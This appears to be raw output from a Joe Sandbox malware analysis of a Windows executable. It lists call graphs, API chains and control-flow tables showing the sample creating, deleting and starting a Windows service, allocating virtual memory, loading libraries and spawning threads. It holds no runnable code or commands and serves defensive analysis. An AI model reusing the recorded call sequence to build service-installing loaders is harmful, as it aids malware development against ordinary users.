17403->17395 17403->17399 17404 7ff8bfb27a4c BuildCatchObjectHelperInternal 2 API calls 17404->17406 17405 7ff8bfb21bba 17407 7ff8bfb21bc5 17405->17407 17420 7ff8bfb221f0 17405->17420 17406->17403 17406->17404 17406->17405 17409 7ff8bfb21110 Concurrency::cancel_current_task 51 API calls 17407->17409 17410 7ff8bfb21bcb 17409->17410 17424 7ff8bfb21b34 17411->17424 17415 7ff8bfb2111e Concurrency::cancel_current_task 17414->17415 17416 7ff8bfb23990 std::_Xinvalid_argument 2 API calls 17415->17416 17417 7ff8bfb2112f 17416->17417 17418 7ff8bfb2379c __std_exception_copy 49 API calls 17417->17418 17419 7ff8bfb21159 17418->17419 17421 7ff8bfb221fe Concurrency::cancel_current_task 17420->17421 17422 7ff8bfb23990 std::_Xinvalid_argument 2 API calls 17421->17422 17423 7ff8bfb2220f 17422->17423 17429 7ff8bfb21ab0 17424->17429 17427 7ff8bfb23990 std::_Xinvalid_argument 2 API calls 17428 7ff8bfb21b56 17427->17428 17430 7ff8bfb2379c __std_exception_copy 49 API calls 17429->17430 17431 7ff8bfb21ae4 17430->17431 17431->17427 15924 140013670 InitializeCriticalSection CreateEventW CreateEventW CreateEventW 15927 1400054e0 15924->15927 15926 1400136ef 15928 140005506 _lock 15927->15928 15929 14000552c 15927->15929 15928->15926 15930 1400074d0 LdrLoadDll 15929->15930 15931 140005536 15930->15931 15932 140008370 3 API calls 15931->15932 15935 140005545 _SetThrowImageBase 15932->15935 15933 1400055b8 15934 140008de0 _lock 2 API calls 15933->15934 15936 1400055c0 sprintf_s 15934->15936 15935->15933 15937 1400074f0 LdrLoadDll 15935->15937 15936->15928 15938 140005561 CreateThread 15937->15938 15938->15936 15939 1400055b0 GetLastError 15938->15939 15939->15933 14039 140005a70 GetStartupInfoW GetProcessHeap HeapAlloc 14040 140005ab1 14039->14040 14041 140005add GetVersionExA 14039->14041 14042 140005abf 14040->14042 14089 140009540 14040->14089 14043 140005b0e GetProcessHeap HeapFree 14041->14043 14044 140005af0 GetProcessHeap HeapFree 14041->14044 14097 140009300 14042->14097 14049 140005b3c 14043->14049 14047 140005d0b 14044->14047 14048 140005ac9 14108 140008510 GetModuleHandleA 14048->14108 14112 14000a310 HeapCreate 14049->14112 14052 140005bec 14053 140005c12 14052->14053 14054 140005bf0 14052->14054 14056 140005c17 14053->14056 14055 140005bfe 14054->14055 14057 140009540 _lock 12 API calls 14054->14057 14058 140009300 _lock 10 API calls 14055->14058 14060 140005c3d 14056->14060 14062 140005c29 14056->14062 14063 140009540 _lock 12 API calls 14056->14063 14057->14055 14059 140005c08 14058->14059 14061 140008510 _lock 3 API calls 14059->14061 14115 140009f50 GetStartupInfoA 14060->14115 14061->14053 14064 140009300 _lock 10 API calls 14062->14064 14063->14062 14065 140005c33 14064->14065 14068 140008510 _lock 3 API calls 14065->14068 14068->14060 14069 140005c56 14135 140009e30 14069->14135 14072 140005c5b 14153 140009c30 14072->14153 14076 140005c73 14077 140005c81 14076->14077 14078 1400084e0 _lock 12 API calls 14076->14078 14183 140009690 14077->14183 14078->14077 14080 140005c86 14081 140005c94 14080->14081 14082 1400084e0 _lock 12 API calls 14080->14082 14195 140008650 14081->14195 14082->14081 14084 140005c9e 14085 1400084e0 _lock 12 API calls 14084->14085 14086 140005ca9 14084->14086 14085->14086 14199 140001520 14086->14199 14088 140005ad3 14088->14047 14094 14000954e _lock 14089->14094 14090 14000961c 14090->14042 14091 14000959c 14092 140009300 _lock 10 API calls 14091->14092 14092->14090 14093 1400095c9 GetStdHandle 14093->14091 14095 1400095dc 14093->14095 14094->14090 14094->14091 14094->14093 14095->14091 14096 1400095e2 WriteFile 14095->14096 14096->14091 14101 140009320 _lock 14097->14101 14098 140009330 14098->14048 14099 1400094dc GetStdHandle 14099->14098 14100 1400094ef 14099->14100 14100->14098 14102 1400094f5 WriteFile 14100->14102 14101->14098 14101->14099 14104 140009375 _lock 14101->14104 14102->14098 14103 1400093b9 GetModuleFileNameA 14105 1400093d9 _lock 14103->14105 14104->14098 14104->14103 14217 14000f000 14105->14217 14109 140008543 ExitProcess 14108->14109 14110 14000852a GetProcAddress 14108->14110 14110->14109 14111 14000853f 14110->14111 14111->14109 14113 14000a334 14112->14113 14114 14000a339 HeapSetInformation 14112->14114 14113->14052 14114->14052 14243 140008370 14115->14243 14117 14000a17c 14118 14000a1c4 GetStdHandle 14117->14118 14120 14000a239 SetHandleCount 14117->14120 14121 14000a1d8 GetFileType 14117->14121 14126 14000edc0 _lock 3 API calls 14117->14126 14127 140005c48 14117->14127 14118->14117 14119 140008370 3 API calls 14123 140009f8a 14119->14123 14120->14127 14121->14117 14122 14000a0e3 14122->14117 14124 14000a11c GetFileType 14122->14124 14122->14127 14248 14000edc0 14122->14248 14123->14117 14123->14119 14123->14122 14123->14127 14124->14122 14126->14117 14127->14069 14128 1400084e0 14127->14128 14129 140009540 _lock 12 API calls 14128->14129 14130 1400084ed 14129->14130 14131 140009300 _lock 10 API calls 14130->14131 14132 1400084f4 14131->14132 14133 1400073e0 _lock LdrLoadDll 14132->14133 14134 140008500 14133->14134 14136 140009e7c 14135->14136 14137 140009e3e GetCommandLineW 14135->14137 14140 140009e81 GetCommandLineW 14136->14140 14141 140009e69 14136->14141 14138 140009e49 GetCommandLineW 14137->14138 14139 140009e5e GetLastError 14137->14139 14138->14139 14139->14141 14143 140009e75 14139->14143 14140->14141 14142 140009e91 GetCommandLineA MultiByteToWideChar 14141->14142 14141->14143 14144 140009ec8 14142->14144 14145 140009ed9 14142->14145 14143->14072 14144->14072 14146 140008370 3 API calls 14145->14146 14147 140009eeb 14146->14147 14148 140009f32 14147->14148 14149 140009ef3 MultiByteToWideChar 14147->14149 14148->14072 14150 140009f13 14149->14150 14151 140009f2a 14149->14151 14150->14072 14262 140008de0 14151->14262 14154 140009c52 GetEnvironmentStringsW 14153->14154 14155 140009c86 14153->14155 14158 140009c6c GetLastError 14154->14158 14159 140009c60 14154->14159 14156 140009c91 GetEnvironmentStringsW 14155->14156 14157 140009c77 14155->14157 14156->14159 14175 140005c67 14156->14175 14160 140009d09 GetEnvironmentStrings 14157->14160 14157->14175 14158->14155 14158->14157 14267 140008300 14159->14267 14162 140009d17 14160->14162 14160->14175 14161 140009d58 14165 140008370 3 API calls 14161->14165 14162->14161 14164 140009d20 MultiByteToWideChar 14162->14164 14164->14162 14164->14175 14167 140009d68 14165->14167 14170 140009d7d 14167->14170 14171 140009d70 FreeEnvironmentStringsA 14167->14171 14168 140009ce1 __SehTransFilter 14173 140009cef FreeEnvironmentStringsW 14168->14173 14169 140009cd1 FreeEnvironmentStringsW 14169->14175 14172 140009de5 FreeEnvironmentStringsA 14170->14172 14174 140009d90 MultiByteToWideChar 14170->14174 14171->14175 14172->14175 14173->14175 14174->14170 14176 140009e0e 14174->14176 14179 1400099c0 GetModuleFileNameW 14175->14179 14177 140008de0 _lock 2 API calls 14176->14177 14178 140009e16 FreeEnvironmentStringsA 14177->14178 14178->14175 14180 140009a03 14179->14180 14181 140008300 _lock 17 API calls 14180->14181 14182 140009bca 14180->14182 14181->14182 14182->14076 14184 1400096b2 14183->14184 14185 1400096a8 14183->14185 14186 140008370 3 API calls 14184->14186 14185->14080 14194 1400096fa 14186->14194 14187 140009709 14187->14080 14188 1400097a5 14189 140008de0 _lock 2 API calls 14188->14189 14190 1400097b4 14189->14190 14190->14080 14191 140008370 3 API calls 14191->14194 14192 1400097e5 14193 140008de0 _lock 2 API calls 14192->14193 14193->14190 14194->14187 14194->14188 14194->14191 14194->14192 14197 140008666 14195->14197 14198 1400086bf 14197->14198 14283 140005380 14197->14283 14198->14084 14200 140001565 14199->14200 14201 140001569 14200->14201 14202 14000157e 14200->14202 14321 140001430 GetModuleFileNameW OpenSCManagerW 14201->14321 14205 140001595 OpenSCManagerW 14202->14205 14206 14000164f 14202->14206 14207 1400015b2 GetLastError 14205->14207 14208 1400015cf OpenServiceW 14205->14208 14209 140001654 14206->14209 14210 140001669 StartServiceCtrlDispatcherW 14206->14210 14207->14088 14211 140001611 DeleteService 14208->14211 14212 1400015e9 GetLastError CloseServiceHandle 14208->14212 14330 1400011f0 14209->14330 14210->14088 14214 140001626 CloseServiceHandle CloseServiceHandle 14211->14214 14215 14000161e GetLastError 14211->14215 14212->14088 14214->14088 14215->14214 14218 14000f01e __SehTransFilter 14217->14218 14219 14000f03b LoadLibraryA 14218->14219 14220 14000f125 _lock 14218->14220 14221 14000f054 GetProcAddress 14219->14221 14222 1400094c9 14219->14222 14232 14000f165 14220->14232 14240 1400073e0 LdrLoadDll 14220->14240 14221->14222 14223 14000f06d _lock 14221->14223 14222->14048 14227 14000f075 GetProcAddress 14223->14227 14225 1400073e0 _lock LdrLoadDll 14225->14222 14226 1400073e0 _lock LdrLoadDll 14233 14000f1e9 14226->14233 14229 140007220 _lock 14227->14229 14231 14000f094 GetProcAddress 14229->14231 14230 1400073e0 _lock LdrLoadDll 14230->14232 14235 14000f0b3 _lock 14231->14235 14232->14226 14236 14000f1a3 _lock 14232->14236 14234 1400073e0 _lock LdrLoadDll 14233->14234 14233->14236 14234->14236 14235->14220 14237 14000f0e9 GetProcAddress 14235->14237 14236->14225 14238 14000f101 _lock 14237->14238 14238->14220 14239 14000f10d GetProcAddress 14238->14239 14239->14220 14241 140007333 14240->14241 14241->14240 14242 140007403 14241->14242 14242->14230 14244 1400083a0 14243->14244 14246 1400083e0 14244->14246 14247 1400083be Sleep 14244->14247 14254 14000e850 14244->14254 14246->14123 14247->14244 14247->14246 14249 1400073e0 _lock LdrLoadDll 14248->14249 14250 14000edec _lock 14249->14250 14251 14000ee26 GetModuleHandleA 14250->14251 14252 14000ee1d _lock 14250->14252 14251->14252 14253 14000ee38 GetProcAddress 14251->14253 14252->14122 14253->14252 14255 14000e865 14254->14255 14256 14000e8be HeapAlloc 14255->14256 14258 14000e876 _lock 14255->14258 14259 1400090b0 14255->14259 14256->14255 14256->14258 14258->14244 14260 1400073e0 _lock LdrLoadDll 14259->14260 14261 1400090c5 14260->14261 14261->14255 14263 140008de9 HeapFree 14262->14263 14266 140008e19 _lock 14262->14266 14264 140008dff _lock 14263->14264 14263->14266 14265 140008e09 GetLastError 14264->14265 14265->14266 14266->14148 14269 140008320 14267->14269 14270 140008358 14269->14270 14271 140008338 Sleep 14269->14271 14272 1400090f0 14269->14272 14270->14168 14270->14169 14271->14269 14271->14270 14273 14000919e 14272->14273 14280 140009103 14272->14280 14274 1400090b0 _lock LdrLoadDll 14273->14274 14277 1400091a3 _lock 14274->14277 14275 14000914c HeapAlloc 14275->14280 14281 140009173 _lock 14275->14281 14276 140009540 _lock 12 API calls 14276->14280 14277->14269 14278 140009300 _lock 10 API calls 14278->14280 14279 1400090b0 _lock LdrLoadDll 14279->14280 14280->14275 14280->14276 14280->14278 14280->14279 14280->14281 14282 140008510 _lock 3 API calls 14280->14282 14281->14269 14282->14280 14286 140005250 14283->14286 14285 140005389 14285->14198 14287 140005271 14286->14287 14288 1400073e0 _lock LdrLoadDll 14287->14288 14289 14000527e 14288->14289 14290 1400073e0 _lock LdrLoadDll 14289->14290 14291 14000528d 14290->14291 14296 1400052f0 _lock 14291->14296 14298 140008490 14291->14298 14293 1400052b5 14294 1400052d9 14293->14294 14293->14296 14301 140008400 14293->14301 14294->14296 14297 140008400 7 API calls 14294->14297 14296->14285 14297->14296 14299 1400084c5 HeapSize 14298->14299 14300 140008499 _lock 14298->14300 14300->14293 14303 140008430 14301->14303 14304 140008450 Sleep 14303->14304 14305 140008472 14303->14305 14306 14000e920 14303->14306 14304->14303 14304->14305 14305->14294 14307 14000e935 14306->14307 14308 14000e94c 14307->14308 14317 14000e95e 14307->14317 14309 140008de0 _lock 2 API calls 14308->14309 14312 14000e951 14309->14312 14310 14000e9b1 14311 1400090b0 _lock LdrLoadDll 14310->14311 14320 14000e9b9 _lock 14311->14320 14312->14303 14313 14000e973 HeapReAlloc 14313->14317 14313->14320 14314 14000e9f4 _lock 14316 14000e9f9 GetLastError 14314->14316 14315 1400090b0 _lock LdrLoadDll 14315->14317 14316->14320 14317->14310 14317->14313 14317->14314 14317->14315 14318 14000e9db _lock 14317->14318 14319 14000e9e0 GetLastError 14318->14319 14319->14320 14320->14303 14322 140001482 CreateServiceW 14321->14322 14323 14000147a GetLastError 14321->14323 14325 1400014ea GetLastError 14322->14325 14326 1400014df CloseServiceHandle 14322->14326 14324 1400014fd 14323->14324 14336 140004f30 14324->14336 14327 1400014f2 CloseServiceHandle 14325->14327 14326->14327 14327->14324 14329 14000150d 14329->14088 14331 1400011fa 14330->14331 14345 1400051d0 14331->14345 14334 140004f30 sprintf_s NtAllocateVirtualMemory 14335 140001262 14334->14335 14335->14088 14338 140004f39 _SetThrowImageBase 14336->14338 14337 140004f44 14337->14329 14338->14337 14341 140006c95 14338->14341 14340 14000660e sprintf_s 14340->14329 14342 140006d9d 14341->14342 14344 140006d7b 14341->14344 14342->14340 14343 140006f95 NtAllocateVirtualMemory 14343->14342 14344->14342 14344->14343 14348 140008270 14345->14348 14347 140001238 MessageBoxW 14347->14334 14349 14000827e 14348->14349 14350 1400082ac _lock 14348->14350 14349->14350 14352 140008120 14349->14352 14350->14347 14353 14000813b _lock 14352->14353 14354 14000816a 14352->14354 14353->14350 14354->14353 14356 1400081d7 14354->14356 14358 140007f50 14354->14358 14356->14353 14357 140007f50 sprintf_s 54 API calls 14356->14357 14357->14353 14364 140007f69 sprintf_s 14358->14364 14359 140007f74 _lock 14359->14356 14360 14000801d 14361 1400080d5 14360->14361 14362 14000802f 14360->14362 14365 14000cc00 sprintf_s 54 API calls 14361->14365 14363 14000804c 14362->14363 14367 140008081 14362->14367 14374 14000cc00 14363->14374 14364->14359 14364->14360 14371 14000cd50 14364->14371 14368 140008056 14365->14368 14367->14368 14382 14000c2a0 14367->14382 14368->14356 14372 140008300 _lock 17 API calls 14371->14372 14373 14000cd6a 14372->14373 14373->14360 14375 14000cc3f 14374->14375 14381 14000cc23 _lock sprintf_s 14374->14381 14375->14381 14390 14000fc50 14375->14390 14379 14000ccc5 _lock sprintf_s 14435 14000fd20 LeaveCriticalSection 14379->14435 14381->14368 14383 14000c2e0 14382->14383 14385 14000c2c3 _lock sprintf_s 14382->14385 14384 14000fc50 sprintf_s 25 API calls 14383->14384 14383->14385 14386 14000c34e 14384->14386 14385->14368 14387 14000c1f0 sprintf_s 2 API calls 14386->14387 14388 14000c367 _lock sprintf_s 14386->14388 14387->14388 14469 14000fd20 LeaveCriticalSection 14388->14469 14391 14000fc96 14390->14391 14392 14000fccb 14390->14392 14436 14000b400 14391->14436 14394 14000ccac 14392->14394 14395 14000fccf EnterCriticalSection 14392->14395 14394->14379 14400 14000c3f0 14394->14400 14395->14394 14403 14000c42e 14400->14403 14419 14000c427 _lock sprintf_s 14400->14419 14401 140004f30 sprintf_s NtAllocateVirtualMemory 14402 14000cbe6 14401->14402 14402->14379 14406 14000c4fb _SetThrowImageBase sprintf_s 14403->14406 14403->14419 14463 14000c1f0 14403->14463 14405 14000c841 14407 14000c86a 14405->14407 14408 14000cb20 WriteFile 14405->14408 14406->14405 14409 14000c526 GetConsoleMode 14406->14409 14411 14000c936 14407->14411 14415 14000c876 14407->14415 14410 14000cb53 GetLastError 14408->14410 14408->14419 14409->14405 14412 14000c557 14409->14412 14410->14419 14417 14000c940 14411->14417 14425 14000ca02 14411->14425 14412->14405 14413 14000c564 GetConsoleCP 14412->14413 14413->14419 14429 14000c581 sprintf_s 14413->14429 14414 14000c8c5 WriteFile 14414->14415 14416 14000c928 GetLastError 14414->14416 14415->14414 14415->14419 14416->14419 14417->14419 14420 14000c991 WriteFile 14417->14420 14418 14000ca57 WideCharToMultiByte 14422 14000cb15 GetLastError 14418->14422 14418->14425 14419->14401 14420->14417 14421 14000c9f4 GetLastError 14420->14421 14421->14419 14422->14419 14423 14000cab0 WriteFile 14424 14000caf6 GetLastError 14423->14424 14423->14425 14424->14419 14424->14425 14425->14418 14425->14419 14425->14423 14426 14000fd50 7 API calls sprintf_s 14426->14429 14427 14000c649 WideCharToMultiByte 14427->14419 14428 14000c68c WriteFile 14427->14428 14428->14429 14430 14000c80d GetLastError 14428->14430 14429->14419 14429->14426 14429->14427 14431 14000c829 GetLastError 14429->14431 14432 14000c6e2 WriteFile 14429->14432 14434 14000c81b GetLastError 14429->14434 14430->14419 14431->14419 14432->14429 14433 14000c7ff GetLastError 14432->14433 14433->14419 14434->14419 14437 14000b41e 14436->14437 14438 14000b42f EnterCriticalSection 14436->14438 14442 14000b2f0 14437->14442 14440 14000b423 14440->14438 14441 1400084e0 _lock 12 API calls 14440->14441 14441->14438 14443 14000b317 14442->14443 14444 14000b32e 14442->14444 14445 140009540 _lock 12 API calls 14443->14445 14446 140008300 _lock 17 API calls 14444->14446 14450 14000b342 _lock 14444->14450 14447 14000b31c 14445->14447 14448 14000b350 14446->14448 14449 140009300 _lock 10 API calls 14447->14449 14448->14450 14453 14000b400 _lock 22 API calls 14448->14453 14451 14000b324 14449->14451 14450->14440 14452 140008510 _lock GetModuleHandleA GetProcAddress ExitProcess 14451->14452 14452->14444 14454 14000b371 14453->14454 14455 14000b3a7 14454->14455 14456 14000b379 14454->14456 14457 140008de0 _lock HeapFree GetLastError 14455->14457 14458 14000edc0 _lock LdrLoadDll GetModuleHandleA GetProcAddress 14456->14458 14462 14000b392 _lock 14457->14462 14459 14000b386 14458->14459 14461 140008de0 _lock HeapFree GetLastError 14459->14461 14459->14462 14460 14000b3b0 LeaveCriticalSection 14460->14450 14461->14462 14462->14460 14464 14000c20c sprintf_s 14463->14464 14465 14000c212 _lock 14464->14465 14466 14000c22c SetFilePointer 14464->14466 14465->14406 14467 14000c24a GetLastError 14466->14467 14468 14000c254 sprintf_s 14466->14468 14467->14468 14468->14406 14035 140006c95 14036 140006d9d 14035->14036 14038 140006d7b 14035->14038 14037 140006f95 NtAllocateVirtualMemory 14037->14036 14038->14036 14038->14037 14470 1400054e0 14471 140005506 _lock 14470->14471 14472 14000552c 14470->14472 14483 1400074d0 14472->14483 14475 140008370 3 API calls 14478 140005545 _SetThrowImageBase 14475->14478 14476 1400055b8 14477 140008de0 _lock 2 API calls 14476->14477 14479 1400055c0 sprintf_s 14477->14479 14478->14476 14487 1400074f0 14478->14487 14479->14471 14482 1400055b0 GetLastError 14482->14476 14485 140007333 14483->14485 14484 140005536 14484->14475 14485->14484 14486 1400073e0 LdrLoadDll 14485->14486 14486->14485 14489 140007333 14487->14489 14488 140005561 CreateThread 14488->14479 14488->14482 14489->14488 14490 1400073e0 LdrLoadDll 14489->14490 14490->14489

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 131 140006c95-140006d75 132 1400075a3-1400075af 131->132 133 140006d7b-140006d9b 131->133 134 140006da2-140006dbc 133->134 135 140006d9d 133->135 136 140006dc3-140006ded 134->136 137 140006dbe 134->137 135->132 138 140006df4-140006e04 136->138 139 140006def 136->139 137->132 140 140006e06 138->140 141 140006e0b-140006e19 138->141 139->132 140->132 142 140006e1b 141->142 143 140006e20-140006e2f 141->143 142->132 144 140006e31 143->144 145 140006e36-140006e4e 143->145 144->132 146 140006e5a-140006e67 145->146 147 140006e69-140006e94 146->147 148 140006e9d-140006ed0 146->148 150 140006e96 147->150 151 140006e9b 147->151 149 140006edc-140006ee9 148->149 152 140006f89-140006f8e 149->152 153 140006eef-140006f23 149->153 150->132 151->146 157 140006f95-140006fd6 NtAllocateVirtualMemory 152->157 158 140006f90 152->158 155 140006f25-140006f2d 153->155 156 140006f2f-140006f33 153->156 159 140006f37-140006f7a 155->159 156->159 157->132 160 140006fdc-140007020 157->160 158->132 161 140006f84 159->161 162 140006f7c-140006f80 159->162 163 14000702c-140007037 160->163 161->149 162->161 165 140007039-140007058 163->165 166 14000705a-140007062 163->166 165->163 167 14000706e-14000707b 166->167 169 140007081-140007094 167->169 170 140007148-14000715e 167->170 171 140007096-1400070a9 169->171 172 1400070ab 169->172 173 1400072e2-1400072eb 170->173 174 140007164-14000717a 170->174 171->172 175 1400070ad-1400070db 171->175 176 140007064-14000706a 172->176 174->173 177 1400070ea-140007101 175->177 176->167 178 140007143 177->178 179 140007103-140007141 177->179 178->176 179->177
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID:
                      • String ID: @$@
                      • API String ID: 0-149943524
                      • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                      • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                      • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                      • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 256 1400073e0-1400073e9 LdrLoadDll 257 1400073f8-140007401 256->257 258 140007403 257->258 259 140007408-14000742e 257->259 260 1400075a3-1400075af 258->260 262 140007435-140007462 259->262 263 140007430 259->263 265 140007464-14000747e 262->265 266 1400074b6-1400074e9 262->266 264 140007559-140007567 263->264 272 140007341-1400073de 264->272 273 14000756c-1400075a2 264->273 268 1400074b4 265->268 269 140007480-1400074b3 265->269 270 1400074eb-14000752b 266->270 271 14000752c-140007535 266->271 268->271 269->268 270->271 274 140007552 271->274 275 140007537-140007554 271->275 272->256 273->260 274->260 275->264
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: Load
                      • String ID:
                      • API String ID: 2234796835-0
                      • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                      • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                      • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                      • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

                      Control-flow Graph

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.3099969322.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                      • Associated: 00000004.00000002.3099954469.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3099988577.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100004125.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.3100019850.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_140000000_eSmF2v.jbxd
                      Similarity
                      • API ID: File$CreateReadmalloc
                      • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                      • API String ID: 3950102678-3381721293
                      • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                      • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                      • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                      • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 25 7ff8bfb21c00-7ff8bfb21c06 26 7ff8bfb21c08-7ff8bfb21c0b 25->26 27 7ff8bfb21c41-7ff8bfb21c4b 25->27 29 7ff8bfb21c0d-7ff8bfb21c10 26->29 30 7ff8bfb21c35-7ff8bfb21c74 call 7ff8bfb22470 26->30 28 7ff8bfb21d68-7ff8bfb21d7d 27->28 34 7ff8bfb21d8c-7ff8bfb21da6 call 7ff8bfb22304 28->34 35 7ff8bfb21d7f 28->35 32 7ff8bfb21c28 __scrt_dllmain_crt_thread_attach 29->32 33 7ff8bfb21c12-7ff8bfb21c15 29->33 47 7ff8bfb21c7a-7ff8bfb21c8f call 7ff8bfb22304 30->47 48 7ff8bfb21d42 30->48 36 7ff8bfb21c2d-7ff8bfb21c34 32->36 38 7ff8bfb21c21-7ff8bfb21c26 call 7ff8bfb223b4 33->38 39 7ff8bfb21c17-7ff8bfb21c20 33->39 45 7ff8bfb21da8-7ff8bfb21dd9 call 7ff8bfb2242c call 7ff8bfb222d4 call 7ff8bfb227b4 call 7ff8bfb225d0 call 7ff8bfb225f4 call 7ff8bfb2245c 34->45 46 7ff8bfb21ddb-7ff8bfb21e0c call 7ff8bfb22630 34->46 40 7ff8bfb21d81-7ff8bfb21d8b 35->40 38->36 45->40 57 7ff8bfb21e1d-7ff8bfb21e23 46->57 58 7ff8bfb21e0e-7ff8bfb21e14 46->58 60 7ff8bfb21d5a-7ff8bfb21d67 call 7ff8bfb22630 47->60 61 7ff8bfb21c95-7ff8bfb21ca6 call 7ff8bfb22374 47->61 51 7ff8bfb21d44-7ff8bfb21d59 48->51 63 7ff8bfb21e65-7ff8bfb21e6d call 7ff8bfb21720 57->63 64 7ff8bfb21e25-7ff8bfb21e2f 57->64 58->57 62 7ff8bfb21e16-7ff8bfb21e18 58->62 60->28 77 7ff8bfb21ca8-7ff8bfb21ccc call 7ff8bfb22778 call 7ff8bfb222c4 call 7ff8bfb222e8 call 7ff8bfb27b10 61->77 78 7ff8bfb21cf7-7ff8bfb21d01 call 7ff8bfb225d0 61->78 68 7ff8bfb21f02-7ff8bfb21f0f 62->68 79 7ff8bfb21e72-7ff8bfb21e7b 63->79 69 7ff8bfb21e31-7ff8bfb21e34 64->69 70 7ff8bfb21e36-7ff8bfb21e3c 64->70 75 7ff8bfb21e3e-7ff8bfb21e44 69->75 70->75 84 7ff8bfb21ef8-7ff8bfb21f00 75->84 85 7ff8bfb21e4a-7ff8bfb21e5f call 7ff8bfb21c00 75->85 77->78 127 7ff8bfb21cce-7ff8bfb21cd5 __scrt_dllmain_after_initialize_c 77->127 78->48 101 7ff8bfb21d03-7ff8bfb21d0f call 7ff8bfb22620 78->101 80 7ff8bfb21e7d-7ff8bfb21e7f 79->80 81 7ff8bfb21eb3-7ff8bfb21eb5 79->81 80->81 88 7ff8bfb21e81-7ff8bfb21ea3 call 7ff8bfb21720 call 7ff8bfb21d68 80->88 90 7ff8bfb21ebc-7ff8bfb21ed1 call 7ff8bfb21c00 81->90 91 7ff8bfb21eb7-7ff8bfb21eba 81->91 84->68 85->63 85->84 88->81 121 7ff8bfb21ea5-7ff8bfb21eaa 88->121 90->84 110 7ff8bfb21ed3-7ff8bfb21edd 90->110 91->84 91->90 112 7ff8bfb21d11-7ff8bfb21d1b call 7ff8bfb22538 101->112 113 7ff8bfb21d35-7ff8bfb21d40 101->113 117 7ff8bfb21edf-7ff8bfb21ee2 110->117 118 7ff8bfb21ee4-7ff8bfb21ef2 110->118 112->113 126 7ff8bfb21d1d-7ff8bfb21d2b 112->126 113->51 122 7ff8bfb21ef4 117->122 118->122 121->81 122->84 126->113 127->78 128 7ff8bfb21cd7-7ff8bfb21cf4 call 7ff8bfb27acc 127->128 128->78
                      APIs
                      Memory Dump Source
                      • Source File: 00000004.00000002.3100050588.00007FF8BFB21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB20000, based on PE: true
                      • Associated: 00000004.00000002.3100035731.00007FF8BFB20000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100069140.00007FF8BFB32000.00000002.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100085617.00007FF8BFB3D000.00000004.00000001.01000000.00000009.sdmpDownload File
                      • Associated: 00000004.00000002.3100100374.00007FF8BFB3F000.00000002.00000001.01000000.00000009.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_7ff8bfb20000_eSmF2v.jbxd
                      Similarity
                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                      • String ID:
                      • API String ID: 190073905-0
                      • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
